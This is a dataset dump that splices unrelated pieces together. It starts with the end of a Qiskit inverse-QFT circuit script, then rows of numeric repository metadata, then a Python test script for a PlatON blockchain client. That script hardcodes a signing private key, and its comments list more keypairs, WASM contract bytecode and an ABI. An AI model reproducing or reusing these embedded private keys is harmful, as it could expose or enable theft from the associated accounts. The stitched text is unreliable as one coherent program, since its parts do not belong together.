#qc.u1(pi/2, qr[8])
#qc.u1(pi, qr[9])
qc.u1(-pi/8, qr[7])
qc.ccx(qr[1], qr[4], qr[7])
qc.u1(-pi/8, qr[4])
qc.u1(-pi/8, qr[1])
qc.u1(pi/8, qr[7])
qc.ccx(qr[1], qr[4], qr[7])
qc.u1(-pi/4, qr[8])
qc.ccx(qr[1], qr[4], qr[8])
qc.u1(-pi/4, qr[4])
qc.u1(-pi/4, qr[1])
qc.u1(pi/4, qr[8])
qc.ccx(qr[1], qr[4], qr[8])
qc.u1(-pi/2, qr[9])
qc.ccx(qr[1], qr[4], qr[9])
qc.u1(-pi/2, qr[4])
qc.u1(-pi/2, qr[1])
qc.u1(pi/2, qr[9])
qc.ccx(qr[1], qr[4], qr[9])
################################
###invqft5
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
qc.h(qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(-pi/4, qr[7])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[8])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/8, qr[7])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(-pi/4, qr[8])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.h(qr[9])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/16, qr[7])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/8, qr[8])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(-pi/4, qr[9])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.h(qr[10])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/32, qr[7])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/16, qr[8])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/8, qr[9])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(-pi/4, qr[10])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.h(qr[11])
################################
    #inverse qft on qubits 0 and 1
qc.swap(qr[0], qr[1])
qc.h(qr[0])
qc.u1(-pi/4, qr[1])
qc.cx(qr[0], qr[1])
qc.u1(-pi/4, qr[0])
qc.u1(pi/4, qr[1])
qc.cx(qr[0], qr[1])
qc.h(qr[1])
qc.measure(qr, cr)
result = Q_program.execute(["superposition"], backend='local_qasm_simulator', shots=g)
print(result)
print(result.get_data("superposition"))
| 22.035176
| 108
| 0.418529
| 3,693
| 17,540
| 1.984024
| 0.037097
| 0.152859
| 0.227651
| 0.095537
| 0.867613
| 0.8107
| 0.776443
| 0.766207
| 0.760748
| 0.760748
| 0
| 0.146469
| 0.289624
| 17,540
| 795
| 109
| 22.062893
| 0.441573
| 0.136488
| 0
| 0.90625
| 0
| 0
| 0.006067
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001953
| false
| 0
| 0.007813
| 0
| 0.009766
| 0.003906
| 0
| 0
| 1
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d71c65d5817c4dd938e1d20422e6341be37a2eb9
| 41,799
|
py
|
Python
|
tests/WasmTest1.py
|
jiuen1115/SM-client-sdk-python
|
88ffa77b196803fb141c0b4d27d2841aaebab800
|
[
"MIT"
] | 7
|
2019-03-18T06:56:18.000Z
|
2021-05-06T07:41:02.000Z
|
tests/WasmTest1.py
|
jiuen1115/SM-client-sdk-python
|
88ffa77b196803fb141c0b4d27d2841aaebab800
|
[
"MIT"
] | 12
|
2020-09-18T05:46:27.000Z
|
2021-12-24T09:38:31.000Z
|
tests/WasmTest1.py
|
PlatONnetwork/client-sdk-python
|
94ad57bb34b5ee7bb314ac858071686382c55402
|
[
"MIT"
] | 16
|
2019-02-28T03:21:14.000Z
|
2021-07-15T06:49:39.000Z
|
from hexbytes import HexBytes
from client_sdk_python import Web3, HTTPProvider
from client_sdk_python.eth import PlatON
# import binascii
# f = open('D:/juzhen/SimpleStorage.wasm','rb')
# contents=f.read()
# bytecode=binascii.b2a_hex(contents)
true = True
false = False
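# The aliases above let the JSON-style literals pasted below (the abi entries
# use lowercase true/false) evaluate as plain Python.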
#10.1.1.5 ./keytool genkeypair
# Address: lax1du4w3q0h5gpxh2vpdvtl7m8h2p9qj40a2krhx7
# PrivateKey: de66562d36f1db46a55f966cfb0eb0981e3e219aa6050612e9f3cb29b8b5c89d
# PublicKey : 6c71c6cfaed8732dafe6ce8888165ac6c8a126e286c226d0ea08fcac768ece512d1eeffad2c442ade2376b2c47472dcea7e30882855f5a3557261b95a72ae9d8
# 10.1.1.8 juzix@juzix:~/linux/bin$ ./keytool genkeypair
# Address: lax13gz7uf8eht4p0leeq3r5z6c88es458twj2tfu9
# PrivateKey: a90f9b646e699909cc5a5c8a95bff1bfd744755fa99a0db03327212527d3c33b
# PublicKey : fc731c6429a0b752e896aa9593afdbae9c10f5f7b77fbcb28820aa9600c2273cf2291deca15670432feac9dbdd56097772bc4cb8d219d094055107e004da6e3d
w3 = Web3(HTTPProvider("http://10.1.1.2:6789"))
platon = PlatON(w3)
print(w3.isConnected())
# from_address = "lax1du4w3q0h5gpxh2vpdvtl7m8h2p9qj40a2krhx7"
from_address = "lax1uqug0zq7rcxddndleq4ux2ft3tv6dqljphydrl"
print(from_address)
# send_privatekey = "de66562d36f1db46a55f966cfb0eb0981e3e219aa6050612e9f3cb29b8b5c89d"
send_privatekey = "983759fe9aac227c535b21d78792d79c2f399b1d43db46ae6d50a33875301557"
# bytecode='0061736d0100000001480d60027f7f0060017f017f60017f0060027f7f017f60037f7f7f017f60000060037f7f7f0060047f7f7f7f017f60047f7f7f7f0060027f7e006000017f60027f7e017f60017f017e02a9010703656e760c706c61746f6e5f70616e6963000503656e7617706c61746f6e5f6765745f696e7075745f6c656e677468000a03656e7610706c61746f6e5f6765745f696e707574000203656e7617706c61746f6e5f6765745f73746174655f6c656e677468000303656e7610706c61746f6e5f6765745f7374617465000703656e7610706c61746f6e5f7365745f7374617465000803656e760d706c61746f6e5f72657475726e0000034e4d05000003030307000201000201050104060201000c000101010902000b0203030507010201000003090404060002000104000003000403020000080001000407020406020000050601010800000405017001030305030100020608017f0141d088040b073904066d656d6f72790200115f5f7761736d5f63616c6c5f63746f727300070f5f5f66756e63735f6f6e5f65786974002706696e766f6b6500140908010041010b0208080ac9644d0400104d0b0b00200041186a200110090b800101027f230041206b22032400024020002802042202200028020847044020022001100b1a2000200028020441246a3602040c010b200341086a2000200220002802006b41246d220241016a100c2002200041086a100d22022802082001100b1a2002200228020841246a36020820002002100e2002100f0b200341206a24000ba10101037f20004200370200200041086a2202410036020020012d0000410171450440200020012902003702002002200141086a28020036020020000f0b20012802082103024020012802042201410a4d0440200020014101743a0000200041016a21020c010b200141106a4170712204101321022000200136020420002004410172360200200020023602080b200220032001104e200120026a41003a000020000b250020002001100a1a2000410c6a2001410c6a100a1a200041186a200141186a100a1a20000b2f01017f2001200028020820002802006b41246d2200410174220220022001491b41c7e3f138200041e3f1b81c491b0b4c01017f2000410036020c200041106a2003360200200104402001101021040b2000200436020020002004200241246c6a220236020820002004200141246c6a36020c2000200236020420000b900101027f2000280204210220002802002103034020022003464504402001280204415c6a2002415c6a2202101120012001280204415c6a3602040c010b0b200028020021022000200128020436020020012002360204200028020421022000200128020836020420012002360208200028020821022000200128020c3602082001200236020c200120012802043602000b2b01027f200028020821012000280204210203402001200247044020002001415c6a22013602080c010b0b0b0900200041246c10130b620020002001290200370200200041086a200141086a28020036020020011012200041146a200141146a2802003602002000200129020c37020c2001410c6a1012200041206a200141206a28020036020020002001290218370218200141186a10120b2201017f03402001410c470440200020016a4100360200200141046a21010c010b0b0b0b002000410120001b10150b9f0602057f017e230041a0016b22002400104d10012201101522031002200041206a200041086a200320011016220241001017200041206a101802400240200041206a1019450d002000280224450d0020002802202d000041c001490d010b10000b20004180016a200041206a101a200028028401220141094f044010000b20002802800121030340200104402001417f6a210120033100002005420886842105200341016a21030c010b0b024002402005500d00418008101b200551044020024101101c0c020b418508101b200551044020024102101c0c020b419108101b20055104402002101d410147044010000b200041206a101e21032000413c6a280200210220002802382104200041d8006a101f210120004198016a410036020020004190016a420037030020004188016a4200370300200042003703800120004180016a200220046b41246d41ff0171ad22051020200028028001210220004180016a4104721021200120021022200120051023220128020c200141106a28020047044010000b200128020020012802041006200128020c22020440200120023602100b200310240c020b41a208101b2005520d002002101d410247044010000b200041206a200241011017200041206a101802400240200041206a1019450d002000280224450d0020002802202d000041c001490d010b10000b20004180016a200041206a101a2000280
28401220141024f044010000b4100210220002802800121030340200104402001417f6a210120032d00002102200341016a21030c010b0b200041206a101e2103200041c8006a200041206a280218200241ff017141246c6a410c6a100a1a200041d8006a101f210120004198016a410036020020004190016a420037030020004188016a4200370300200042003703800120004180016a200041f0006a200041c8006a100a102521022000280280012104200241046a1021200120041022200120004180016a200041c8006a100a1026220128020c200141106a28020047044010000b200128020020012802041006200128020c22020440200120023602100b200310240c010b10000b1027200041a0016a24000b9b0101047f230041106b220124002001200036020c2000047f41c808200041086a2202411076220041c8082802006a220336020041c40841c408280200220420026a41076a417871220236020002400240200341107420024d044041c808200341016a360200200041016a21000c010b2000450d010b200040000d0010000b20042001410c6a4104103c41086a0541000b2100200141106a240020000b0c00200020012002411c10280bc90202067f017e230041106b220324002001280208220520024b0440200341086a2001102d20012003280208200328020c102e36020c20032001102d410021052001027f410020032802002207450d001a410020032802042208200128020c2206490d001a200820062006417f461b210420070b360210200141146a2004360200200141003602080b200141106a210603402001280214210402402005200249044020040d01410021040b200020062802002004411410281a200341106a24000f0b20032001102d41002104027f410020032802002205450d001a410020032802042208200128020c2207490d001a200820076b2104200520076a0b2105200120043602142001200536021020032006410020052004102e10512001200329030022093702102001200128020c2009422088a76a36020c2001200128020841016a22053602080c000b000b4101017f200028020445044010000b0240200028020022012d0000418101470d00200028020441014d047f100020002802000520010b2c00014100480d0010000b0b980101037f200028020445044041000f0b20001018200028020022022c0000220141004e044020014100470f0b027f4101200141807f460d001a200141ff0171220341b7014d0440200028020441014d047f100020002802000520020b2d00014100470f0b4100200341bf014b0d001a2000280204200141ff017141ca7e6a22014d047f100020002802000520020b20016a2d00004100470b0bd50101047f200110292204200128020422024b04401000200128020421020b200128020021052000027f02400240200204404100210120052c00002203417f4a0d01027f200341ff0171220141bf014d04404100200341ff017141b801490d011a200141c97e6a0c010b4100200341ff017141f801490d001a200141897e6a0b41016a21010c010b4101210120050d000c010b41002103200120046a20024b0d0020022001490d00410020022004490d011a200120056a2103200220016b20042004417f461b0c010b41000b360204200020033602000b3901027e42a5c688a1c89ca7f94b210103402000300000220250450440200041016a2100200142b383808080207e20028521010c010b0b20010b6701027f23004180016b22022400200241306a102a200241306a102b21032000101d410247044010000b200241086a200041011017200241086a2003102c200241086a101e2100200241086a200241d8006a2003100b20011100002000102420024180016a24000b800101047f230041106b2201240002402000280204450d0020002802002d000041c001490d00200141086a2000102d200128020c210003402000450d01200141002001280208220320032000102e22046a20034520002004497222031b3602084100200020046b20031b2100200241016a21020c000b000b200141106a240020020be906010c7f230041b0016b22042400200042003702182000428ed1dd82cbd38f9ca07f3703102000410036020820004200370200200041206a4100360200200441206a101f22072000290310102f200728020c200741106a28020047044010000b200041186a21052000411c6a21090240200728020022022007280204220810032206450d002006101321030340200120036a41003a00002006200141016a2201470d000b20022008200320011004417f460440410021010c010b02400240200441086a200341016a200120036a2003417f736a10162203280204450d0020032802002d000041c001490d002003101d21012000280220200028021822026b41246d20014904402005200441386a2001
200028021c20026b41246d200041206a100d2201100e2001100f0b20044188016a2003410110302101200441f8006a2003410010302108200041206a210b20012802042103034020082802042003464100200128020822022008280208461b0d02200441e0006a20032002411c1028200441386a102b2203102c0240200028021c220220002802204904402002200310112009200928020041246a3602000c010b20044198016a2005200220052802006b41246d220241016a100c2002200b100d210220042802a00120031011200420042802a00141246a3602a00120052002100e2002100f0b20012001280204220320012802086a410020031b22033602042001280200220204402001200236020820032002102e210a2001027f2001280204220c4504404100210241000c010b41002102410020012802082203200a490d001a2003200a200a417f461b2102200c0b2203ad2002ad42208684370204200141002001280200220a20026b22022002200a4b1b3602000c0105200141003602080c010b000b000b10000b200621010b200728020c22030440200720033602100b024020010d0020002802042206200028020022036b41246d22022000280220200028021822016b41246d4d04402002200928020020016b41246d22084b044020032003200841246c6a2202200110311a20022006200910320c020b2005200320062001103110330c010b200104402005103420004100360220200042003702180b200020052002100c2202101022013602182000200136021c20002001200241246c6a36022020032006200910320b200441b0016a240020000b29002000410036020820004200370200200041001035200041146a41003602002000420037020c20000b840102027f017e4101210320014280015a0440034020012004845045044020044238862001420888842101200241016a2102200442088821040c010b0b200241384f047f2002103620026a0520020b41016a21030b200041186a28020022020440200041086a280200200041146a2802002002103721000b2000200028020020036a3602000bea0101047f230041106b22042400200028020422012000280210220241087641fcffff07716a2103027f410020012000280208460d001a2003280200200241ff07714102746a0b2101200441086a20001038200428020c210203400240200120024604402000410036021420002802082103200028020421010340200320016b41027522024103490d022000200141046a22013602040c000b000b200141046a220120032802006b418020470d0120032802042101200341046a21030c010b0b2002417f6a220241014d04402000418004418008200241016b1b3602100b200020011039200441106a24000b1300200028020820014904402000200110350b0bbc0202037f037e024020015004402000418001103f0c010b20014280015a044020012107034020062007845045044020064238862007420888842107200241016a2102200642088821060c010b0b0240200241384f04402002210303402003044020034108762103200441016a21040c010b0b200441c9004f044010000b2000200441b77f6a41ff0171103f2000200028020420046a1053200028020420002802006a417f6a21042002210303402003450d02200420033a0000200341087621032004417f6a21040c000b000b200020024180017341ff0171103f0b2000200028020420026a1053200028020420002802006a417f6a210203402001200584500d02200220013c0000200542388620014208888421012002417f6a2102200542088821050c000b000b20002001a741ff0171103f0b20004101104220000be206010d7f230041b0016b22012400200141186a101f2106200141a8016a22024100360200200141a0016a2205420037030020014198016a22044200370300200142003703900120014190016a20002903101020200128029001210720014190016a410472102120062007102220062000290310102f200628020c200641106a28020047044010000b200628020421092006280200210a2001101f21032002410036020020054200370300200442003703002001420037039001027f20002802182000411c6a280200460440200141013602900141010c010b20014190016a4100103a2107200028021c200028021822026b2105037f2005047f20074100103a22042002103b2004200141d0006a2002410c6a100a102520014180016a200241186a100a10254101103a1a2005415c6a2105200241246a21020c010520074101103a1a2001280290010b0b0b210420014190016a410472102141011013220241fe013a0000200328020c200341106a28020047044010000b200241016a21072003280204220541016a220820032802084b047f20032008103520032802040520050b20032802006a2
0024101103c1a2003200328020441016a3602042003200420026b20076a10222003200028021c20002802186b41246d103d210b200028021c200028021822026b2105200141d0006a410472210c20014190016a410472210d034020050440200b4103103d210420014100360268200142003703602001420037035820014200370350200141d0006a2002103b200141d0006a200141406b2002410c6a2207100a1025200141306a200241186a2208100a10251a20042001280250102220044101103d2104200141003602a801200142003703a0012001420037039801200142003703900120014190016a20014180016a2002100a10251a200420012802900110222004200141f0006a2002100a10262104200d1021200420014190016a2007100a102620014180016a2008100a10261a200c10212005415c6a2105200241246a21020c010b0b0240200328020c2003280210460440200328020021020c010b100020032802002102200328020c2003280210460d0010000b200a2009200220032802041005200328020c22020440200320023602100b200628020c22020440200620023602100b200041186a103e2000103e200141b0016a24000ba10101037f41012103024002400240200128020420012d00002202410176200241017122041b220241014d0440200241016b0d032001280208200141016a20041b2c0000417f4c0d010c030b200241374b0d010b200241016a21030c010b2002103620026a41016a21030b027f200041186a28020022010440200041086a280200200041146a280200200110370c010b20000b2201200128020020036a36020020000b910101047f410121022001280208200141016a20012d0000220441017122051b210302400240024002402001280204200441017620051b2201410146044020032c000022014100480d012000200141ff0171103f0c040b200141374b0d01200121020b200020024180017341ff0171103f0c010b200020011040200121020b200020032002410010410b20004101104220000b880101037f41b408410136020041b8082802002100034020000440034041bc0841bc082802002201417f6a2202360200200141014845044041b4084100360200200020024102746a22004184016a280200200041046a28020011020041b408410136020041b80828020021000c010b0b41bc08412036020041b808200028020022003602000c010b0b0b730020004200370210200042ffffffff0f370208200020023602042000200136020002402003410871450d002000104f20024f0d002003410471044010000c010b200042003702000b02402003411071450d002000104f20024d0d0020034104710440100020000f0b200042003702000b20000bff0201037f200028020445044041000f0b2000101841012102024020002802002c00002201417f4a0d00200141ff0171220341b7014d0440200341807f6a0f0b02400240200141ff0171220141bf014d0440024020002802042201200341c97e6a22024d047f100020002802040520010b4102490d0020002802002d00010d0010000b200241054f044010000b20002802002d000145044010000b4100210241b7012101034020012003460440200241384f0d030c0405200028020020016a41ca7e6a2d00002002410874722102200141016a21010c010b000b000b200141f7014d0440200341c07e6a0f0b024020002802042201200341897e6a22024d047f100020002802040520010b4102490d0020002802002d00010d0010000b200241054f044010000b20002802002d000145044010000b4100210241f701210103402001200346044020024138490d0305200028020020016a418a7e6a2d00002002410874722102200141016a21010c010b0b0b200241ff7d490d010b10000b20020bc50201027f200041003a0000200041246a2202417f6a41003a0000200041003a0002200041003a00012002417d6a41003a00002002417e6a41003a0000200041003a00032002417c6a41003a00002000410020006b41037122016a220241003602002002412420016b417c7122016a2200417c6a4100360200024020014109490d002002410036020820024100360204200041786a4100360200200041746a410036020020014119490d002002410036021820024100360214200241003602102002410036020c200041706a41003602002000416c6a4100360200200041686a4100360200200041646a41003602002001200241047141187222016b2100200120026a2101034020004120490d0120014200370300200141186a4200370300200141106a4200370300200141086a4200370300200141206a2101200041606a21000c000b000b0b16002000104a2000410c6a104a200041186a104a20000b5e01017f230041306b220224002002200041001017200241186a200241001017200241
186a2001104b200241186a200041011017200241186a2001410c6a104b200241186a200041021017200241186a200141186a104b200241306a24000b2101017f20011029220220012802044b044010000b2000200120011050200210510b2701017f230041206b22022400200241086a2000200141141028104f2100200241206a240020000b09002000200110231a0be70101037f230041106b2204240020004200370200200041086a410036020020012802042103024002402002450440200321020c010b410021022003450d002003210220012802002d000041c001490d00200441086a2001102d20004100200428020c2201200428020822022001102e22032003417f461b20024520012003497222031b220536020820004100200220031b3602042000200120056b3602000c010b20012802002103200128020421012000410036020020004100200220016b20034520022001497222021b36020820004100200120036a20021b3602040b200441106a240020000b3e000340200020014645044020022000104c2002410c6a2000410c6a104c200241186a200041186a104c200241246a2102200041246a21000c010b0b20020b2e000340200020014645044020022802002000100b1a2002200228020041246a360200200041246a21000c010b0b0b0900200020013602040b0b002000200028020010330b2f01017f200028020820014904402001101520002802002000280204103c210220002001360208200020023602000b0b1e01017f03402000044020004108762100200141016a21010c010b0b20010b25002000200120026a417f6a220241087641fcffff07716a280200200241ff07714102746a0b4f01037f20012802042203200128021020012802146a220441087641fcffff07716a21022000027f410020032001280208460d001a2002280200200441ff07714102746a0b360204200020023602000b2501017f200028020821020340200120024645044020002002417c6a22023602080c010b0b0bc30c02077f027e230041306b22042400200041046a2107027f20014101460440200041086a280200200041146a280200200041186a220228020022031037280200210120022003417f6a360200200710434180104f044020072000410c6a280200417c6a10390b200141384f047f2001103620016a0520010b41016a2102200041186a28020022010440200041086a280200200041146a280200200110370c020b20000c010b0240200710430d00200041146a28020022014180084f0440200020014180786a360214200041086a2201280200220228020021032001200241046a360200200420033602182007200441186a10440c010b2000410c6a2802002202200041086a2802006b4102752203200041106a2205280200220620002802046b220141027549044041802010132105200220064704400240200028020c220120002802102202470d0020002802082203200028020422064b04402000200320012003200320066b41027541016a417e6d41027422026a1045220136020c2000200028020820026a3602080c010b200441186a200220066b2201410175410120011b22012001410276200041106a10462102200028020c210320002802082101034020012003470440200228020820012802003602002002200228020841046a360208200141046a21010c010b0b200029020421092000200229020037020420022009370200200029020c21092000200229020837020c2002200937020820021047200028020c21010b200120053602002000200028020c41046a36020c0c020b02402000280208220120002802042202470d00200028020c2203200028021022064904402000200120032003200620036b41027541016a41026d41027422026a104822013602082000200028020c20026a36020c0c010b200441186a200620026b2201410175410120011b2201200141036a410276200041106a10462102200028020c210320002802082101034020012003470440200228020820012802003602002002200228020841046a360208200141046a21010c010b0b200029020421092000200229020037020420022009370200200029020c21092000200229020837020c2002200937020820021047200028020821010b2001417c6a2005360200200020002802082201417c6a22023602082002280200210220002001360208200420023602182007200441186a10440c010b20042001410175410120011b200320051046210241802010132106024020022802082201200228020c2203470d0020022802042205200228020022084b04402002200520012005200520086b41027541016a417e6d41027422036a104522013602082002200228020420036a3602040c010b200441186a200320086b2201410175410120011b22012001410276200241106a280200104
621032002280208210520022802042101034020012005470440200328020820012802003602002003200328020841046a360208200141046a21010c010b0b20022902002109200220032902003702002003200937020020022902082109200220032902083702082003200937020820031047200228020821010b200120063602002002200228020841046a360208200028020c2105034020002802082005460440200028020421012000200228020036020420022001360200200228020421012002200536020420002001360208200029020c21092000200229020837020c2002200937020820021047052005417c6a210502402002280204220120022802002203470d0020022802082206200228020c22084904402002200120062006200820066b41027541016a41026d41027422036a104822013602042002200228020820036a3602080c010b200441186a200820036b2201410175410120011b2201200141036a4102762002280210104621062002280208210320022802042101034020012003470440200428022020012802003602002004200428022041046a360220200141046a21010c010b0b20022902002109200220042903183702002002290208210a20022004290320370208200420093703182004200a37032020061047200228020421010b2001417c6a200528020036020020022002280204417c6a3602040c010b0b0b200441186a20071038200428021c410036020041012102200041186a0b2201200128020020026a360200200441306a240020000b2701017f230041106b2202240020004100103a20022001100a10254101103a1a200241106a24000bfc0801067f03400240200020046a2105200120046a210320022004460d002003410371450d00200520032d00003a0000200441016a21040c010b0b200220046b210602402005410371220745044003402006411049450440200020046a2203200120046a2205290200370200200341086a200541086a290200370200200441106a2104200641706a21060c010b0b027f2006410871450440200120046a2103200020046a0c010b200020046a2205200120046a2204290200370200200441086a2103200541086a0b21042006410471044020042003280200360200200341046a2103200441046a21040b20064102710440200420032f00003b0000200341026a2103200441026a21040b2006410171450d01200420032d00003a000020000f0b024020064120490d002007417f6a220741024b0d00024002400240024002400240200741016b0e020102000b2005200120046a220328020022073a0000200541016a200341016a2f00003b0000200041036a2108200220046b417d6a2106034020064111490d03200420086a2203200120046a220541046a2802002202410874200741187672360200200341046a200541086a2802002207410874200241187672360200200341086a2005410c6a28020022024108742007411876723602002003410c6a200541106a2802002207410874200241187672360200200441106a2104200641706a21060c000b000b2005200120046a220328020022073a0000200541016a200341016a2d00003a0000200041026a2108200220046b417e6a2106034020064112490d03200420086a2203200120046a220541046a2802002202411074200741107672360200200341046a200541086a2802002207411074200241107672360200200341086a2005410c6a28020022024110742007411076723602002003410c6a200541106a2802002207411074200241107672360200200441106a2104200641706a21060c000b000b2005200120046a28020022073a0000200041016a21082004417f7320026a2106034020064113490d03200420086a2203200120046a220541046a2802002202411874200741087672360200200341046a200541086a2802002207411874200241087672360200200341086a2005410c6a28020022024118742007410876723602002003410c6a200541106a2802002207411874200241087672360200200441106a2104200641706a21060c000b000b200120046a41036a2103200020046a41036a21050c020b200120046a41026a2103200020046a41026a21050c010b200120046a41016a2103200020046a41016a21050b20064110710440200520032d00003a00002005200328000136000120052003290005370005200520032f000d3b000d200520032d000f3a000f200541106a2105200341106a21030b2006410871044020052003290000370000200541086a2105200341086a21030b2006410471044020052003280000360000200541046a2105200341046a21030b20064102710440200520032f00003b0000200541026a2105200341026a21030b2006410171450d00200520032d00003a00000b20000b8c0201057f2001044020002802042105
200041106a2802002202200041146a280200220349044020022001ad2005ad422086843702002000200028021041086a36021020000f0b027f41002002200028020c22046b410375220641016a2202200320046b2203410275220420042002491b41ffffffff01200341037541ffffffff00491b2204450d001a200441037410130b2102200220064103746a22032001ad2005ad4220868437020020032000280210200028020c22066b22016b2105200220044103746a2102200341086a2103200141014e0440200520062001103c1a0b20002002360214200020033602102000200536020c20000f0b200041c001103f2000410041004101104120000b0e0020002802000440200010340b0b2500200041011052200028020020002802046a20013a00002000200028020441016a3602040b5e01027f20011036220241b7016a22034180024e044010000b2000200341ff0171103f2000200028020420026a1053200028020420002802006a417f6a2100034020010440200020013a0000200141087621012000417f6a21000c010b0b0b2d00200020021052200028020020002802046a20012002103c1a2000200028020420026a3602042000200310420b820201047f02402001450d00034020002802102202200028020c460d01200241786a28020020014904401000200028021021020b200241786a2203200328020020016b220136020020010d012000200336021020004101200028020422032002417c6a28020022016b22021036220441016a20024138491b220520036a1053200120002802006a220320056a2003200210490240200241374d0440200028020020016a200241406a3a00000c010b200441f7016a220341ff014d0440200028020020016a20033a00002000280200200120046a6a210103402002450d02200120023a0000200241087621022001417f6a21010c000b000b10000b410121010c000b000b0b2801017f200028020820002802046b2201410874417f6a410020011b200028021420002802106a6b0ba10202057f017e230041206b22052400024020002802082202200028020c2203470d0020002802042204200028020022064b04402000200420022004200420066b41027541016a417e6d41027422036a104522023602082000200028020420036a3602040c010b200541086a200320066b2202410175410120021b220220024102762000410c6a10462103200028020821042000280204210203402002200446450440200328020820022802003602002003200328020841046a360208200241046a21020c010b0b20002902002107200020032902003702002003200737020020002902082107200020032902083702082003200737020820031047200028020821020b200220012802003602002000200028020841046a360208200541206a24000b2501017f200120006b220141027521032001044020022000200110490b200220034102746a0b4f01017f2000410036020c200041106a2003360200200104402001410274101321040b200020043602002000200420024102746a22023602082000200420014102746a36020c2000200236020420000b2b01027f200028020821012000280204210203402001200247044020002001417c6a22013602080c010b0b0b1b00200120006b22010440200220016b22022000200110490b20020b8d0301037f024020002001460d00200120006b20026b410020024101746b4d0440200020012002103c1a0c010b20002001734103712103027f024020002001490440200020030d021a410021030340200120036a2105200020036a2204410371450440200220036b210241002103034020024104490d04200320046a200320056a280200360200200341046a21032002417c6a21020c000b000b20022003460d04200420052d00003a0000200341016a21030c000b000b024020030d002001417f6a21040340200020026a22034103714504402001417c6a21032000417c6a2104034020024104490d03200220046a200220036a2802003602002002417c6a21020c000b000b2002450d042003417f6a200220046a2d00003a00002002417f6a21020c000b000b2001417f6a210103402002450d03200020026a417f6a200120026a2d00003a00002002417f6a21020c000b000b200320056a2101200320046a0b210303402002450d01200320012d00003a00002002417f6a2102200341016a2103200141016a21010c000b000b0b170020004200370200200041086a4100360200200010120bf30201057f230041206b22022400024002402000280204044020002802002d000041c001490d010b200241086a104a0c010b200241186a2000101a2000102921030240024002400240200228021822000440200228021c220520034f0d010b41002100200241106a410036020020024200370308410021050c010b200
241106a4100360200200242003703082000200520032003417f461b22046a21052004410a4b0d010b200220044101743a0008200241086a41017221030c010b200441106a4170712206101321032002200436020c20022006410172360208200220033602100b03402000200546450440200320002d00003a0000200341016a2103200041016a21000c010b0b200341003a00000b024020012d0000410171450440200141003b01000c010b200128020841003a00002001410036020420012d0000410171450d00200141003602000b20012002290308370200200141086a200241106a280200360200200241086a1012200241206a24000b8c0201047f20002001470440200128020420012d00002202410176200241017122041b2102200141016a210320012802082105410a21012005200320041b210420002d0000410171220304402000280200417e71417f6a21010b200220014d0440027f2003044020002802080c010b200041016a0b21012002044020012004200210490b200120026a41003a000020002d00004101710440200020023602040f0b200020024101743a00000f0b416f2103200141e6ffffff074d0440410b20014101742201200220022001491b220141106a4170712001410b491b21030b20031013220120042002104e200020023602042000200341017236020020002001360208200120026a41003a00000b0b3501017f230041106b220041d0880436020c41c008200028020c41076a417871220036020041c408200036020041c8083f003602000b100020020440200020012002103c1a0b0b2e01017f200028020445044041000f0b4101210120002802002c0000417f4c047f20001050200010296a0520010b0b5b00027f027f41002000280204450d001a410020002802002c0000417f4a0d011a20002802002d0000220041bf014d04404100200041b801490d011a200041c97e6a0c010b4100200041f801490d001a200041897e6a0b41016a0b0b5b01027f2000027f0240200128020022054504400c010b200220036a200128020422014b0d0020012002490d00410020012003490d011a200220056a2104200120026b20032003417f461b0c010b41000b360204200020043602000b1b00200028020420016a220120002802084b04402000200110350b0b0f00200020011035200020013602040b0b3901004180080b32696e6974006164645f6d657373616765006765745f6d6573736167655f73697a65006765745f6d6573736167655f626f64790a'
# abi=[{"baseclass":[],"fields":[{"name":"head","type":"string"}],"name":"message","type":"struct"},{"baseclass":["message"],"fields":[{"name":"body","type":"string"},{"name":"end","type":"string"}],"name":"my_message","type":"struct"},{"constant":false,"input":[{"name":"one_message","type":"my_message"}],"name":"init","output":"void","type":"Action"},{"constant":false,"input":[{"name":"one_message","type":"my_message"}],"name":"add_message","output":"void","type":"Action"},{"constant":true,"input":[],"name":"get_message_size","output":"uint8","type":"Action"},{"constant":true,"input":[{"name":"index","type":"uint8"}],"name":"get_message_body","output":"string","type":"Action"}]
